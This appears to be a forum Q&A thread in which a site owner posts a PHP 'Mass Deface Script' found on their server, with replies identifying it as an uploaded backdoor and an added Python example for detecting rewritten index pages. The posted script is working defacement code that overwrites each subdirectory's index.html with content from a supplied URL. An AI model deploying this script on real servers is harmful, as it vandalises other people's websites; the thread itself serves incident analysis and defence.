What is this script running?

Viewed 102 times

5

I am a beginner in the area and found this file on my server:

<?php
/*
Script: Mass Deface Script
*/
echo "<center><textarea rows='10' cols='100'>";
// Both values come straight from the POST form below: the URL of the page
// to copy, and the directory whose subdirectories will be overwritten.
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";

if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
            // For every subdirectory, fetch the remote page and write it
            // over that directory's index.html.
            if (filetype($dir.$file) == "dir") {
                $newfile = $dir.$file."/index.html";
                echo $newfile."\n";
                if (!copy($defaceurl, $newfile)) {
                    echo "failed to copy $file...\n";
                }
            }
        }
        closedir($dh);
    }
}
echo "</textarea></center>";
?>


<td align=right>Mass Defacement:</td><br>
</div>
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
<div class="style31">
[+] Main Directory: <input type='text' style='width: 250px' value='<?php  echo getcwd() . "/"; ?>' name='massdefacedir'>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<input type='submit' name='execmassdeface' value='Execute'></div>
</form></td>

Can someone help me understand what this file was running?

  • 4

    Possibly a backdoor that someone has uploaded to your site. Delete this file and check your upload feature, since it is allowing files of the PHP type to be uploaded.

  • 3

    I wouldn’t say "possibly", but "quite possibly" kkkk

  • 2

    I’d say for sure ;)

  • 1

    Make a copy on your personal computer, where it can’t be used remotely, and delete it from the server now. Then review what you have on your server, because somehow there’s a security breach.

  • Yes, indeed a security flaw, but what is it executing?

  • @Cesarlimapaulo see Marcelo’s answer.


1 answer

3

The script returns the current directory where this file is located, checks whether it is manipulable, and creates a new index.html file.

Mass Defacement

The defacers aren’t selective in their targets; in most cases they just use automated tools to find vulnerable servers and automatically exploit them. The exploit automatically uploads a backdoor to the compromised server which will provide, for example, shell access to the compromised server. The defacer can launch further attacks via the backdoor, such as trying to escalate privileges using local kernel exploits, or reporting the compromised server to a defacement archive. These backdoors are also sold on the black market, enabling buyers to, for example, turn a compromised server into a node in a DDoS network, or use it as a spam relay host.

They are target-free attacks: they check for vulnerable sites and exploit them, and can replace files, copy them, or even use the server for spam mailing and DDoS.

That is, your site is somehow vulnerable and allowed access to the server to third parties.


  • I started searching after two websites had their index rewritten. I’m reviewing my security; I think this file was uploaded through some source that allowed the upload of .php. What do you think? Now I’m worried, I have 9 sites on this server and I’m monitoring them. Can you tell me how to create an algorithm that lets my index report itself as online on a page where I can monitor it? As if I had a system that informed me that my sites are OK. I want to put something in place that communicates with me. Accurate monitoring.

  • You can do this, but remember that it will be a stopgap and you must fix this security breach as soon as possible. You make a script that searches the directory, finds index.html, opens it and reads the contents. Read through http://php.net/manual/en/class.directoryiterator.php http://php.net/manual/en/function.file-get-contents.php

  • @C-section The answer was not helpful/correct?
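The monitoring idea from the comments above (walk the site directories, find each index.html, read it) works best as a baseline-and-compare check: record a digest of every index while the sites are known good, then re-run the comparison and report anything that changed. The following is an added example written for this page, not code from the question, the answer or the comments. It assumes the layout the found script itself walks, one site per subdirectory of a web root with an index.html in each; the web root, site names and page contents below are constructed for the demonstration.

```python
"""File-integrity check for the index pages of several sites (added example).

Assumption: every site lives in its own subdirectory of one web root and
has an index.html at its top level, the same layout the found script loops
over. The demo builds that layout in a temporary directory.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path

INDEX_NAME = "index.html"  # assumption: the file each site serves as its front page


def index_files(webroot):
    """Yield <webroot>/<site>/index.html for every site directory.

    Mirrors the one-level directory walk in the found script, but only reads.
    """
    root = Path(webroot)
    for site in sorted(p for p in root.iterdir() if p.is_dir()):
        idx = site / INDEX_NAME
        if idx.is_file():
            yield idx


def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks so large pages are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(webroot):
    """Map site-relative path -> digest; take it while the sites are known good."""
    return {p.relative_to(webroot).as_posix(): sha256_of(p) for p in index_files(webroot)}


def compare(baseline, webroot):
    """Return which index files were modified, added or removed since the baseline."""
    current = build_baseline(webroot)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo():
    """Constructed scenario: three sites; one index gets rewritten, one new dir appears."""
    webroot = tempfile.mkdtemp()
    for site in ("site-a", "site-b", "site-c"):
        os.makedirs(os.path.join(webroot, site))
        Path(webroot, site, INDEX_NAME).write_text(f"<h1>{site} home</h1>\n")
    baseline = build_baseline(webroot)

    # What the found script does to every subdirectory: overwrite its index.html.
    Path(webroot, "site-b", INDEX_NAME).write_text("<h1>Hacked</h1>\n")
    # A directory that was not in the baseline, e.g. something dropped by an upload.
    os.makedirs(os.path.join(webroot, "tmp-upload"))
    Path(webroot, "tmp-upload", INDEX_NAME).write_text("x\n")

    return compare(baseline, webroot)


if __name__ == "__main__":
    # Expected: site-b/index.html modified, tmp-upload/index.html added, nothing removed.
    print(json.dumps(demo(), indent=2))
```

Two things matter when running this for real: take the baseline only after the defaced indexes have been restored from clean copies, and store the baseline (and run the comparison) somewhere other than the compromised server, because anything on that server can be rewritten by whoever placed the script. Comparing digests also catches a rewritten page that still looks "online" to a simple HTTP ping, which is the gap the comment above asks about.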
